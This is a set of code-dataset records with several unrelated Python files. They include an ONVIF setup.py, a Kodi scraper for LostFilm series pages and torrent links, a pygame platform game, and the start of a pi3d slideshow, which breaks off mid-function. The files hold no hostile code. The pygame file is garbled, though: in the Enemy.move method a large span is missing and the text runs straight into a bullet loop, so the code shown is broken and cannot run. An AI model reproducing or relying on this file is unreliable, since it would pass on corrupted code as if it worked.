show_hen(hen_list) :\n '''\n SHOW HEAT EXCHANGER NETWORK HELP :\n ==================================\n \n This fucntion helps you see the composition of\n each HEN in flux couples.\n \n :param hen_list: List of the generated HEN.\n :type hen_list: list\n :returns: Prints the composition of all the created HEN.\n '''\n for henId, hen in enumerate(hen_list) :\n print(\"Network #{}\".format(henId))\n for couple in hen : \n print(\"=> flux {} {} flux {} {} \".format(couple[0].hotCold, couple[0].id ,couple[1].hotCold, couple[1].id))\n return 0\n \n \n","sub_path":"toolkit/class_.py","file_name":"class_.py","file_ext":"py","file_size_in_byte":5590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"77726395","text":"import os\n#from distutils.core import setup\nfrom setuptools import setup\n\nhere = os.path.abspath(os.path.dirname(__file__))\nversion_path = os.path.join(here, 'onvif/version.txt')\nversion = open(version_path).read().strip()\n\nrequires = [ 'suds >= 0.4' ]\n\nsetup(name='onvif',\n version=version,\n description='Python client for ONVIF Camera',\n packages=['onvif'],\n url='https://github.com/quatanium/python-onvif',\n author='quatanium',\n author_email='sinchb128@gmail.com',\n maintainer='sinchb',\n maintainer_email='sinchb128@gmail.com',\n keywords=['ONVIF', 'Camera'],\n install_requires=requires,\n include_package_data=True,\n entry_points={\n 'console_scripts': ['onvif-cli = onvif.cli:main']\n }\n )\n\n\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"151736189","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals\n\nimport hashlib\nimport re\nimport xbmcgui\nfrom collections import namedtuple\n\nfrom concurrent.futures import ThreadPoolExecutor, as_completed\nfrom lostfilm.api import LostFilmApi\nfrom support.abstract.scraper import AbstractScraper, ScraperError, parse_size\nfrom support.common import Attribute, str_to_date, lang\nfrom util.htmldocument import HtmlDocument\nfrom util.timer import Timer\nfrom support.plugin import plugin\n\n\nclass Trailer(namedtuple('Trailer', ['title', 'desc', 'img', 'url'])):\n pass\n\nclass Series(namedtuple('Series', ['id', 'title', 'original_title', 'image', 'icon', 'poster', 'country', 'year',\n 'genres', 'about', 'actors', 'producers', 'writers', 'plot', 'seasons_count',\n 'episodes_count'])):\n pass\n\n\nclass Episode(namedtuple('Episode', ['series_id', 'series_title', 'season_number', 'episode_number', 'episode_title',\n 'original_title', 'release_date', 'icon', 'poster', 'image'])):\n def __eq__(self, other):\n return self.series_id == other.series_id and \\\n self.season_number == other.season_number and \\\n self.episode_number == other.episode_number\n\n def __ne__(self, other):\n return not self == other\n\n def matches(self, series_id=None, season_number=None, episode_number=None):\n def eq(a, b):\n return str(a).lstrip('0') == str(b).lstrip('0')\n\n return (series_id is None or eq(self.series_id, series_id)) and \\\n (season_number is None or eq(self.season_number, season_number)) and \\\n (episode_number is None or eq(self.episode_number, episode_number))\n\n @property\n def is_complete_season(self):\n return self.episode_number == \"999\"\n\n @property\n def is_multi_episode(self):\n return \"-\" in self.episode_number\n\n @property\n def episode_numbers(self):\n if self.is_multi_episode:\n start, end = self.episode_number.split(\"-\", 2)\n return range(int(start), int(end) + 1)\n else:\n return [int(self.episode_number)]\n\n\nclass Quality(Attribute):\n def get_lang_base(self):\n return 40208\n\n SD = (0, 'sd', 'SD')\n HD_720 = (1, 'mp4', 'HD', 'MP4')\n HD_1080 = (2, '1080p', '1080')\n\n def __lt__(self, other):\n return self.id < other.id\n\n\nTorrentLink = namedtuple('TorrentLink', ['quality', 'url', 'size'])\n\n\nclass LostFilmScraper(AbstractScraper):\n BASE_URL = \"https://www.lostfilm.tv\"\n BLOCKED_MESSAGE = \"Контент недоступен на территории Российской Федерации\"\n\n def __init__(self, login, password, cookie_jar=None, xrequests_session=None, series_cache=None, shows_ids_cache=None, max_workers=10):\n super(LostFilmScraper, self).__init__(xrequests_session, cookie_jar)\n self.api = LostFilmApi(cookie_jar, xrequests_session)\n self.shows_ids_dict = shows_ids_cache if shows_ids_cache is not None else {}\n self.series_cache = series_cache if series_cache is not None else {}\n self.max_workers = max_workers\n self.response = None\n self.login = login\n self.password = password\n self.has_more = None\n self.session.headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36'\n self.session.headers['Origin'] = self.BASE_URL\n\n def fetch(self, url, params=None, data=None, forced_encoding=None, **request_params):\n self.response = super(LostFilmScraper, self).fetch(url, params, data, **request_params)\n encoding = self.response.encoding\n\n if encoding == 'ISO-8859-1':\n encoding = 'windows-1251'\n if forced_encoding:\n encoding = forced_encoding\n return HtmlDocument.from_string(self.response.content, encoding)\n\n def authorize(self):\n with Timer(logger=self.log, name='Authorization'):\n if '@' not in self.login:\n raise ScraperError(32019, \"E-Mail %s not contain @\" % self.login, self.login, check_settings=True)\n if not self.authorized():\n res = self.api.auth(mail=self.login, password=self.password)\n self.log.error(repr(res))\n if res['result'] == 'ok' and res.get('success'):\n self.session.cookies['hash'] = self.authorization_hash\n elif res.get('need_captcha'):\n self.log.debug('NEED CAPTCHA')\n dialog = xbmcgui.Dialog()\n dialog.ok(lang(30000), lang(40412))\n raise ScraperError(32003, \"Authorization failed. Captcha\", check_settings=False)\n else:\n self.log.debug(res)\n raise ScraperError(32003, \"Authorization failed\", check_settings=True)\n\n @property\n def authorization_hash(self):\n return hashlib.md5(self.login + self.password).hexdigest()\n\n def authorized(self):\n cookies = self.session.cookies\n if not cookies.get('lf_session'):\n return False\n if cookies.get('hash') != self.authorization_hash:\n try:\n cookies.clear('.lostfilm.tv')\n except KeyError:\n pass\n return False\n return True\n\n def ensure_authorized(self):\n if not self.authorized():\n self.authorize()\n\n # new\n def get_series_bulk(self, series_ids):\n \"\"\"\n :rtype : dict[int, Series]\n \"\"\"\n if not series_ids:\n return {}\n cached_details = self.series_cache.keys()\n not_cached_ids = [_id for _id in series_ids if _id not in cached_details]\n results = dict((_id, self.series_cache[_id]) for _id in series_ids if _id in cached_details)\n if not_cached_ids:\n with Timer(logger=self.log, name=\"Bulk fetching series with IDs \" + \", \".join(str(i) for i in not_cached_ids)):\n with ThreadPoolExecutor(max_workers=self.max_workers) as executor:\n futures = [executor.submit(self.get_series_info, int(_id), self.shows_ids_dict[int(_id)]) for _id in not_cached_ids]\n for future in as_completed(futures):\n result = future.result()\n self.series_cache[result.id] = results[result.id] = result\n return results\n\n # new\n def get_series_episodes_bulk(self, series_ids):\n \"\"\"\n :rtype : dict[int, list[Episode]]\n \"\"\"\n if not series_ids:\n return {}\n results = {}\n with Timer(logger=self.log, name=\"Bulk fetching series episodes with IDs \" + \", \".join(str(i) for i in series_ids)):\n with ThreadPoolExecutor(max_workers=self.max_workers) as executor:\n futures = dict((executor.submit(self.get_series_episodes, int(_id), self.shows_ids_dict[int(_id)]), _id) for _id in series_ids)\n for future in as_completed(futures):\n _id = futures[future]\n results[_id] = future.result()\n return results\n\n def get_series_cached(self, series_id):\n return self.get_series_bulk([series_id])[series_id]\n\n # new\n def get_all_series_ids(self):\n return self.shows_ids_dict.keys()\n\n # new\n def check_for_new_series(self):\n resp = self.api.search_serial(0, 3, 1)\n ids_incr = [int(i['id']) for i in resp]\n if not (set(ids_incr).intersection(self.get_all_series_ids()) == set(ids_incr)):\n skip = 0\n while True:\n r = self.api.search_serial(skip, 2, 0)\n if r:\n for i in r:\n self.shows_ids_dict[int(i['id'])] = i['alias']\n skip += 10\n else:\n break\n\n # new\n def get_favorite_series(self):\n self.ensure_authorized()\n skip = 0\n ids = []\n while True:\n r = self.api.search_serial(skip, 2, 99)\n if r:\n ids_incr = [int(i['id']) for i in r]\n ids.extend(ids_incr)\n skip += 10\n else:\n break\n return ids\n\n # new\n def get_new_series(self):\n self.ensure_authorized()\n skip = 0\n ids = []\n while True:\n r = self.api.search_serial(skip, 3, 1)\n if r:\n ids_incr = [int(i['id']) for i in r]\n ids.extend(ids_incr)\n skip += 10\n else:\n break\n return ids\n\n # new\n def search_serial(self, query):\n skip = 0\n ids = []\n r = self.api.search(query)\n if r:\n ids_incr = [int(i['id']) for i in r]\n ids.extend(ids_incr)\n return ids\n\n # new\n def browse_trailers(self, skip=0):\n page = (skip or 0)\n html = self._get_trailers_doc(page)\n doc = html.find('div', {'class': 'content'})\n with Timer(logger=self.log, name=\"Parsing trailer list\"):\n body = doc.find('div', {'class': 'content'})\n titles = body.find('div', {'class': 'title'}).strings\n descr = body.find('div', {'class': 'description'}).strings\n imgs = body.find('img').attrs('src')\n icons = [url.replace('//', 'http://') for url in imgs]\n videos = body.find('div', {'class': 'play-btn'}).attrs('data-src')\n paging = doc.find('div', {'class': 'pagging-pane'})\n selected_page = paging.find('a', {'class': 'item active'}).text\n last_page = paging.find('a', {'class': 'item'}).last.text\n self.has_more = int(selected_page) < int(last_page)\n data = zip(titles, descr, icons, videos)\n trailers = [Trailer(*t) for t in data if t[0]]\n self.log.info(\"Got %d trailer(s) successfully\" % (len(trailers)))\n self.log.debug(repr(trailers).decode(\"unicode-escape\"))\n return trailers\n\n # new\n def _get_new_episodes_doc(self, page, favorite=False):\n page = str(page)\n type = \"0\"\n if favorite:\n type = \"99\"\n return self.fetch(self.BASE_URL + \"/new/page_%s/type_%s\" % (page, type))\n\n # new\n def browse_episodes(self, skip=0):\n self.ensure_authorized()\n self.check_for_new_series()\n page = (skip or 0) / 10 + 1\n only_favorites = plugin.get_setting('check_only_favorites', bool)\n doc = self._get_new_episodes_doc(page, only_favorites)\n with Timer(logger=self.log, name=\"Parsing episodes list\"):\n body = doc.find('div', {'class': 'content history'})\n series_titles = body.find('div', {'class': 'name-ru'}).strings\n episode_titles = body.find('div', {'class': 'alpha'}).strings[::2]\n original_episode_titles = body.find('div', {'class': 'beta'}).strings[::2]\n release_dates = body.find('div', {'class': 'alpha'}).strings[1::2]\n release_dates = [str_to_date(r_d.split(' ')[-1], '%d.%m.%Y') for r_d in release_dates]\n paging = doc.find('div', {'class': 'pagging-pane'})\n selected_page = paging.find('a', {'class': 'item active'}).text\n last_page = paging.find('a', {'class': 'item'}).last.text\n self.has_more = int(selected_page) < int(last_page)\n data_codes = body.find('div', {'class': 'haveseen-btn.*?'}).attrs('data-code')\n series_ids, season_numbers, episode_numbers = zip(*[parse_data_code(s or \"\") for s in data_codes])\n posters = [img_url(i, y, z) for i, y, z in zip(series_ids, season_numbers, episode_numbers)]\n images = [img_url(series_id) for series_id in series_ids]\n icons = [img_url(series_id).replace('/poster.jpg', '/image.jpg') for series_id in series_ids]\n data = zip(series_ids, series_titles, season_numbers, episode_numbers, episode_titles, original_episode_titles, release_dates, icons, posters, images)\n episodes = [Episode(*e) for e in data if e[0]]\n self.log.info(\"Got %d episode(s) successfully\" % (len(episodes)))\n self.log.debug(repr(episodes).decode(\"unicode-escape\"))\n return episodes\n\n # new\n def _get_series_doc(self, series_alias):\n return self.fetch(self.BASE_URL + \"/series/%s\" % series_alias)\n\n # new\n def _get_episodes_doc(self, series_alias):\n return self.fetch(self.BASE_URL + '/series/%s/seasons/' % series_alias)\n\n # new\n def _get_trailers_doc(self, page):\n page = str(page)\n return self.fetch(self.BASE_URL + \"/video/page_%s/type_1\" % (page))\n\n # new\n def get_series_info(self, series_id, series_alias):\n doc = self._get_series_doc(series_alias)\n with Timer(logger=self.log, name='Parsing series info with ID %s' % series_alias):\n title = doc.find('div', {'class': 'header'})\n series_title = title.find('h1', {'class': 'title-ru'}).text.replace(u'й', u'й')\n original_title = title.find('h2', {'class': 'title-en'}).text\n image = img_url(series_id)\n icon = image.replace('poster.jpg', 'image.jpg')\n details = doc.find('div', {'class': 'details-pane'})\n details_left = details.find('div', {'class': 'left-box'}).text\n details_right = details.find('div', {'class': 'right-box'}).text\n res = re.search('Премьера:( .+)', details_left)\n year = res.group(0).split()[-1] if res else None\n res = re.search('Страна:([\\t\\r\\n]+)(.+)', details_left)\n country = res.group(0).split()[-1] if res else None\n res = re.search('Жанр: (\\r\\n)+((.+)[, ]?\\r\\n)+', details_right)\n genres = re.split('; |, |\\*|\\n', res.group(0)) if res else None\n if genres is not None:\n genres = [g.strip() for g in genres if (len(g) > 3 and ':' not in g)]\n about_and_plot = doc.find('div', {'class': 'text-block description'}).text\n about_and_plot = about_and_plot.split('Сюжет')\n plot = \"\"\n if len(about_and_plot) > 1:\n plot = re.sub(r'\\s+', ' ', about_and_plot[1])\n plot = about_and_plot[1]\n about = about_and_plot[0].strip(' \\t\\n\\r')\n actors = self.fetch_crew(series_alias, 1)\n if actors is not None:\n actors = [(actor.strip().split('\\n')[2], actor.strip().split('\\n')[-1])\n for actor in actors if len(actor.strip()) > 3]\n producers = self.fetch_crew(series_alias, 3)\n if producers is not None:\n producers = [producer.strip().split('\\n')[2] for producer in producers]\n writers = self.fetch_crew(series_alias, 4)\n if writers is not None:\n writers = [writer.strip().split('\\n')[2] for writer in writers]\n counter = self._get_episodes_doc(series_alias)\n body = counter.find('div', {'class': 'series-block'})\n episodes_count = len(body.find('td', {'class': 'zeta'}))\n seasons_count = len(body.find('div', {'class': 'movie-details-block'}))\n poster = img_url(series_id, seasons_count)\n\n series = Series(series_id, series_title, original_title, image, icon, poster, country, year,\n genres, about, actors, producers, writers, plot, seasons_count, episodes_count)\n\n self.log.info(\"Parsed '%s' series info successfully\" % series_title)\n self.log.debug(repr(series).decode(\"unicode-escape\"))\n\n return series\n\n # new\n def get_series_episodes(self, series_id, series_alias=None):\n if not series_alias:\n series_alias = self.shows_ids_dict[int(series_id)]\n doc = self._get_episodes_doc(series_alias)\n episodes = []\n with Timer(logger=self.log, name='Parsing episodes of series with ID %s' % series_alias):\n title = doc.find('div', {'class': 'header'})\n series_title = title.find('h2', {'class': 'title-en'}).text\n image = img_url(series_id)\n icon = image.replace('/poster.jpg', '/image.jpg')\n episodes_data = doc.find('div', {'class': 'series-block'})\n seasons = episodes_data.find('div', {'class': 'serie-block'})\n year = seasons.last.find('div', {'class': 'details'}).text\n year = re.search('Год: (\\d{4})', year)\n year = year.group(1) if year else None\n if year:\n series_title += \" (%s)\" % year\n for s in seasons:\n fullseason = s.find('div', {'class': 'movie-details-block'})\n inactive = fullseason.find('div', {'class': 'external-btn inactive'})\n if not inactive:\n button = fullseason.find('div', {'class': 'haveseen-btn.*?'}).attr('data-code')\n if button:\n series_id, season_number, episode_number = parse_data_code(button)\n episode_title = lang(40424) % season_number\n orig_title = \"\"\n release_date=str_to_date(\"17.09.1989\", \"%d.%m.%Y\")\n poster = img_url(series_id, season_number, episode_number)\n episode = Episode(series_id, series_title, season_number, episode_number, episode_title, orig_title, release_date, icon, poster, image)\n episodes.append(episode)\n episodes_table = s.find('table', {'class': 'movie-parts-list'})\n if not episodes_table.attrs('id')[0]:\n self.log.warning(\"No ID for table. New season of {0}\".format(series_title))\n continue\n if episodes_table.attrs('id')[0][-6:] == u'999999':\n pass\n # IS SPECIAL SEASON\n titles = episodes_table.find('td', {'class': 'gamma.*?'})\n orig_titles = titles.find('span').strings\n episode_titles = [t.split('\\n')[0].strip().replace(u\"й\", u\"й\").replace(u\"И\", u\"Й\") for t in titles.strings]\n #episode_dates = [str(d.split(':')[-1])[1:] for d in episodes_table.find('td', {'class': 'delta'}).strings]\n episode_dates = []\n for d in episodes_table.find('td', {'class': 'delta'}).strings:\n d = d.split(':')\n d = d[-1]\n d = d[1:]\n d = d.replace('янв ', '01.01.').replace('фев ', '01.02.').replace('мар ', '01.03').replace('апр','01.04')\\\n .replace('май','01.05').replace('июн','01.06').replace('июл','01.07').replace('авг','01.08').replace('сен','01.09')\\\n .replace('окт','01.10').replace('ноя','01.11').replace('дек','01.12')\n it = str(d)\n episode_dates.append(it)\n onclick = episodes_table.find('div', {'class': 'haveseen-btn.*?'}).attrs('data-code')\n for e in range(len(onclick)):\n data_code = onclick[e]\n if not data_code:\n continue\n _, season_number, episode_number = parse_data_code(onclick[e])\n episode_title = episode_titles[e]\n orig_title = orig_titles[e]\n release_date = str_to_date(episode_dates[e], \"%d.%m.%Y\")\n poster = img_url(series_id, season_number, episode_number)\n episode = Episode(series_id, series_title, season_number, episode_number, episode_title, orig_title, release_date, icon, poster, image)\n episodes.append(episode)\n self.log.info(\"Got %d episode(s) successfully\" % (len(episodes)))\n self.log.debug(repr(episodes).decode(\"unicode-escape\"))\n return episodes\n\n # new\n def fetch_crew(self, series_alias, crew_type):\n doc = self.fetch(self.BASE_URL + \"/series/%s/cast/type_%s\" % (series_alias, crew_type))\n info = doc.find('div', {'class': 'text-block persons'}).text\n return info.replace('\\t', '').replace('\\r', '').split('\\n\\n\\n\\n')[1:] or None\n\n # new\n def get_torrent_links(self, series_id, season_number, episode_number):\n doc = self.fetch(self.BASE_URL + '/v_search.php', {\n 'c': series_id,\n 's': season_number,\n 'e': episode_number\n })\n if 'log in first' in doc.text:\n raise ScraperError(32003, \"Authorization failed\", check_settings=True)\n redirect = doc.find('a').attr('href')\n doc = self.fetch(redirect, forced_encoding='utf-8')\n links = []\n with Timer(logger=self.log, name='Parsing torrent links'):\n row = doc.find('div', {'class': 'inner-box--item'})\n qualities = row.find('div', {'class': 'inner-box--label'}).strings\n urls = row.find('div', {'class': 'inner-box--link sub'}).strings\n sizes = re.findall('(\\\\d+\\\\.\\\\d+ ..)', row.text)\n for url, qua, size in zip(urls, qualities, sizes):\n links.append(TorrentLink(Quality.find(qua), url, parse_size(size)))\n self.log.info(\"Got %d link(s) successfully\" % (len(links)))\n self.log.info(repr(links).decode(\"unicode-escape\"))\n return links\n\n\ndef parse_data_code(s):\n res = s.split(\"-\")\n if len(res) == 3:\n series_id, season, episode = res\n series_id = int(series_id)\n season = int(season)\n return series_id, season, episode\n elif len(res) == 2:\n series_id, season = res\n series_id = int(series_id)\n season = int(season)\n return series_id, season, \"999\"\n else:\n return 0, 0, \"\"\n\n\ndef img_url(series_id, season=None, episode=999):\n if season:\n if episode == 999 or episode == \"999\":\n return 'http://static.lostfilm.tv/Images/{0}/Posters/shmoster_s{1}.jpg'.format(series_id, season)\n else:\n return 'http://static.lostfilm.tv/Images/{0}/Posters/e_{1}_{2}.jpg'.format(series_id, season, episode)\n else:\n return 'http://static.lostfilm.tv/Images/{0}/Posters/poster.jpg'.format(series_id)\n","sub_path":"resources/lib/lostfilm/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":22385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"371917423","text":"import pygame\nsuccesses, fails = pygame.init()\nprint(successes, fails)\n\nmove_right = [pygame.image.load(\"hero/R1.png\"), pygame.image.load(\"hero/R2.png\"), pygame.image.load(\"hero/R3.png\"), pygame.image.load(\"hero/R4.png\"), pygame.image.load(\"hero/R5.png\"), pygame.image.load(\"hero/R6.png\"), pygame.image.load(\"hero/R7.png\"), pygame.image.load(\"hero/R8.png\"), pygame.image.load(\"hero/R9.png\")]\nmove_left = [pygame.image.load(\"hero/L1.png\"), pygame.image.load(\"hero/L2.png\"), pygame.image.load(\"hero/L3.png\"), pygame.image.load(\"hero/L4.png\"), pygame.image.load(\"hero/L5.png\"), pygame.image.load(\"hero/L6.png\"), pygame.image.load(\"hero/L7.png\"), pygame.image.load(\"hero/L8.png\"), pygame.image.load(\"hero/L9.png\")]\n\nmove_rightE = [pygame.image.load(\"enemy/R1E.png\"), pygame.image.load(\"enemy/R2E.png\"), pygame.image.load(\"enemy/R3E.png\"), pygame.image.load(\"enemy/R4E.png\"), pygame.image.load(\"enemy/R5E.png\"), pygame.image.load(\"enemy/R6E.png\"), pygame.image.load(\"enemy/R7E.png\"), pygame.image.load(\"enemy/R8E.png\"), pygame.image.load(\"enemy/R9E.png\"), pygame.image.load(\"enemy/R10E.png\"), pygame.image.load(\"enemy/R11E.png\")]\nmove_leftE = [pygame.image.load(\"enemy/L1E.png\"), pygame.image.load(\"enemy/L2E.png\"), pygame.image.load(\"enemy/L3E.png\"), pygame.image.load(\"enemy/L4E.png\"), pygame.image.load(\"enemy/L5E.png\"), pygame.image.load(\"enemy/L6E.png\"), pygame.image.load(\"enemy/L7E.png\"), pygame.image.load(\"enemy/L8E.png\"), pygame.image.load(\"enemy/L9E.png\"), pygame.image.load(\"enemy/L10E.png\"), pygame.image.load(\"enemy/L10E.png\")]\n\nbulletsound = pygame.mixer.Sound('sounds/bullet.wav')\nhitsound = pygame.mixer.Sound('sounds/hit.wav')\n\nbg = pygame.image.load(\"background.jpg\")\nhero = pygame.image.load(\"standing.png\")\n\nscreenWidth = 588\nscreenHeight = 294\nclock = pygame.time.Clock()\n\nscreen = pygame.display.set_mode((screenWidth, screenHeight))\npygame.display.set_caption(\"salah game\")\n\nBLACK = (0, 0, 0) # RGB\nWHITE = (255, 255, 255)\nRED = (255, 0, 0)\nGREEN=(0,100,0)\n\nscore=0\n\nclass Player():\n def __init__(self, x, y, width, height):\n self.x = x\n self.y = y\n self.x_start=x\n self.y_start=y\n self.width = width\n self.height = height\n self.step = 5\n self.left = False\n self.right = False\n self.moves = 0\n self.speed = 10\n self.isJumping = False\n self.hitbox=(self.x+20,self.y+10,self.width-40,self.height-10)\n\n def draw(self, screen):\n if self.left:\n screen.blit(move_left[self.moves // 2], (self.x, self.y))\n self.moves += 1\n if self.moves == 18:\n self.moves = 0\n elif self.right:\n screen.blit(move_right[self.moves // 2], (self.x, self.y))\n self.moves += 1\n if self.moves == 18:\n self.moves = 0\n else:\n screen.blit(hero, (self.x, self.y))\n\n self.hitbox=(self.x+20,self.y+10,self.width-40,self.height-10)\n #pygame.draw.rect(screen,RED,self.hitbox,1)\n def hit(self):\n self.speed = 10\n self.isJumping = False\n self.x=self.x_start\n self.y=self.y_start\n self.moves=0\n font1=pygame.font.SysFont('comicsans',70)\n text=font1.render('-5',1,RED)\n screen.blit(text,(screenWidth//2-1,140))\n pygame.display.update()\n\n i=0\n while i<50:\n i+=1\n pygame.time.delay(20)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n quit()\nclass Bullet:\n def __init__(self,x,y,radius,color,direction,step):\n self.x=x\n self.y=y\n self.radius=radius\n self.color=color\n self.direction=direction\n self.step=step*direction\n def draw(self,screen):\n pygame.draw.circle(screen,self.color,(self.x,self.y),self.radius)\nclass Enemy:\n def __init__(self,x,y,width,height,end):\n self.x=x\n self.y=y\n self.width=width\n self.height=height\n self.end=end\n self.start=x\n self.step=3\n self.moves=0\n self.hitbox = (self.x + 20, self.y , self.width - 35, self.height)\n self.health=20\n self.visible=True\n\n def draw(self,screen):\n if self.visible:\n self.move()\n if self.step<0:\n screen.blit(move_leftE[self.moves // 2], (self.x, self.y))\n self.moves += 1\n if self.moves == 11*2:\n self.moves = 0\n else:\n screen.blit(move_rightE[self.moves // 2], (self.x, self.y))\n self.moves += 1\n if self.moves == 11*2:\n self.moves = 0\n pygame.draw.rect(screen,RED,(self.hitbox[0]-3,self.hitbox[1]-15,50,7))\n pygame.draw.rect(screen, GREEN, (self.hitbox[0]-3, self.hitbox[1] - 15, self.health*5, 7))\n\n self.hitbox = (self.x + 20, self.y , self.width - 35, self.height )\n #pygame.draw.rect(screen, RED, self.hitbox, 1)\n def move(self):\n if self.step>0:\n if self.x+self.step>self.end:\n self.step*=-1\n else:\n self.x += self.step\n else:\n if self.x-self.step 0:\n bullet.x += bullet.step\n else:\n bullets.remove(bullet)\n\n\n\n if keys[pygame.K_LEFT] and man.x - man.step >= 0:\n man.x -= man.step\n man.left = True\n man.right = False\n man.standing = False\n elif keys[pygame.K_RIGHT] and man.x + man.width + man.step <= screenWidth:\n man.x += man.step\n man.right = True\n man.left = False\n man.standing = False\n else:\n man.standing = True\n man.moves = 0\n if not man.isJumping:\n if keys[pygame.K_SPACE]:\n man.isJumping = True\n else:\n if man.speed >= -10:\n neg = 1\n if man.speed < 0:\n neg = -1\n man.y -= (man.speed ** 2) * 0.25 * neg\n man.speed -= 1\n else:\n man.speed = 10\n man.isJumping = False\n\n redrawGame()","sub_path":"pyg.py","file_name":"pyg.py","file_ext":"py","file_size_in_byte":8039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"460122053","text":"#!/usr/bin/python\n\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n''' Simplified slideshow system ufrom pi3d\nhttps://github.com/pi3d/pi3d_demos\n'''\nimport os\nimport time\nimport random\nimport sys\nsys.path.insert(1, '/home/pi/pi3d')\n\nimport pi3d\nfrom PIL import Image, ExifTags, ImageFilter # these are needed for getting exif data from images\n\n#####################################################\n# these variables are constants\n#####################################################\nPIC_DIR = '/home/pi/src/vrniture-pictures/' #'textures'\nFPS = 20\nFIT = True\nEDGE_ALPHA = 0 # see background colour at edge. 1.0 would show reflection of image\nBACKGROUND = (0, 0, 0, 1.0)\nRESHUFFLE_NUM = 1 # times through before reshuffling\nRECENT_N = 0 # shuffle the most recent ones to play before the rest\nCHECK_DIR_TM = 86400 # seconds to wait between checking if directory has changed\nBLUR_EDGES = False # use blurred version of image to fill edges - will override FIT = False\nBLUR_AMOUNT = 12 # larger values than 12 will increase processing load quite a bit\nBLUR_ZOOM = 1.0 # must be >= 1.0 which expands the backgorund to just fill the space around the image\n\n# Random ken burns or not - DG 25/4/20\nKENBURNS = bool(random.getrandbits(1)) # will set FIT->False and BLUR_EDGES->False\n\nKEYBOARD = False # set to False when running headless to avoid curses error. True for debugging\n\n#####################################################\n# these variables can be altered using MQTT messaging\n#####################################################\ntime_delay = 120 # between slides\nfade_time = 5.0\nshuffle = True # shuffle on reloading\ndate_from = None\ndate_to = None\nquit = False\npaused = False # NB must be set to True after the first iteration of the show!\n\n#####################################################\n# only alter below here if you're keen to experiment!\n#####################################################\nif KENBURNS:\n FIT = False\n BLUR_EDGES = False\n\nif BLUR_ZOOM < 1.0:\n BLUR_ZOOM = 1.0\n\ndelta_alpha = 1.0 / (FPS * fade_time) # delta alpha\nlast_file_change = 0.0 # holds last change time in directory structure\nnext_check_tm = time.time() + CHECK_DIR_TM # check if new file or directory every hour\n\n#####################################################\n# some functions to tidy subsequent code\n#####################################################\ndef tex_load(fname, orientation, size=None):\n try:\n im = Image.open(fname)\n im.putalpha(255) # this will convert to RGBA and set alpha to opaque\n if orientation == 2:\n im = im.transpose(Image.FLIP_LEFT_RIGHT)\n if orientation == 3:\n im = im.transpose(Image.ROTATE_180) # rotations are clockwise\n if orientation == 4:\n im = im.transpose(Image.FLIP_TOP_BOTTOM)\n if orientation == 5:\n im = im.transpose(Image.FLIP_LEFT_RIGHT).transpose(Image.ROTATE_270)\n if orientation == 6:\n im = im.transpose(Image.ROTATE_270)\n if orientation == 7:\n im = im.transpose(Image.FLIP_LEFT_RIGHT).transpose(Image.ROTATE_90)\n if orientation == 8:\n im = im.transpose(Image.ROTATE_90)\n if BLUR_EDGES and size is not None:\n wh_rat = (size[0] * im.size[1]) / (size[1] * im.size[0])\n if abs(wh_rat - 1.0) > 0.01: # make a blurred background\n (sc_b, sc_f) = (size[1] / im.size[1], size[0] / im.size[0])\n if wh_rat > 1.0:\n (sc_b, sc_f) = (sc_f, sc_b) # swap round\n (w, h) = (round(size[0] / sc_b / BLUR_ZOOM), round(size[1] / sc_b / BLUR_ZOOM))\n (x, y) = (round(0.5 * (im.size[0] - w)), round(0.5 * (im.size[1] - h)))\n box = (x, y, x + w, y + h)\n blr_sz = (int(x * 512 / size[0]) for x in size)\n im_b = im.resize(size, resample=0, box=box).resize(blr_sz)\n im_b = im_b.filter(ImageFilter.GaussianBlur(BLUR_AMOUNT))\n im_b = im_b.resize(size, resample=Image.BICUBIC)\n im_b.putalpha(round(255 * EDGE_ALPHA)) # to apply the same EDGE_ALPHA as the no blur method.\n im = im.resize((int(x * sc_f) for x in im.size), resample=Image.BICUBIC)\n im_b.paste(im, box=(round(0.5 * (im_b.size[0] - im.size[0])),\n round(0.5 * (im_b.size[1] - im.size[1]))))\n im = im_b # have to do this as paste applies in place\n tex = pi3d.Texture(im, blend=True, m_repeat=True, automatic_resize=True, free_after_load=True)\n except Exception as e:\n print('''Couldn't load file {} giving error: {}'''.format(fname, e))\n tex = None\n return tex\n\ndef check_changes():\n global last_file_change\n update = False\n for root, _, _ in os.walk(PIC_DIR):\n mod_tm = os.stat(root).st_mtime\n if mod_tm > last_file_change:\n last_file_change = mod_tm\n update = True\n return update\n\ndef get_files(dt_from=None, dt_to=None):\n # dt_from and dt_to are either None or tuples (2016,12,25)\n if dt_from is not None:\n dt_from = time.mktime(dt_from + (0, 0, 0, 0, 0, 0))\n if dt_to is not None:\n dt_to = time.mktime(dt_to + (0, 0, 0, 0, 0, 0))\n global shuffle, PIC_DIR, EXIF_DATID, last_file_change\n file_list = []\n extensions = ['.png','.JPG', '.jpg','.jpeg'] # can add to these\n for root, _dirnames, filenames in os.walk(PIC_DIR):\n mod_tm = os.stat(root).st_mtime # time of alteration in a directory\n if mod_tm > last_file_change:\n last_file_change = mod_tm\n for filename in filenames:\n ext = os.path.splitext(filename)[1].lower()\n if ext in extensions and not '.AppleDouble' in root and not filename.startswith('.'):\n file_path_name = os.path.join(root, filename)\n include_flag = True\n orientation = 1 # this is default - unrotated\n if EXIF_DATID is not None and EXIF_ORIENTATION is not None:\n try:\n im = Image.open(file_path_name) # lazy operation so shouldn't load (better test though)\n print(filename, end=\"\")\n exif_data = im._getexif()\n print('orientation is {}'.format(exif_data[EXIF_ORIENTATION]))\n dt = time.mktime(\n time.strptime(exif_data[EXIF_DATID], '%Y:%m:%d %H:%M:%S'))\n orientation = int(exif_data[EXIF_ORIENTATION])\n except Exception as e: # NB should really check error here but it's almost certainly due to lack of exif data\n print('trying to read exif', e)\n dt = os.path.getmtime(file_path_name) # so use file last modified date\n if 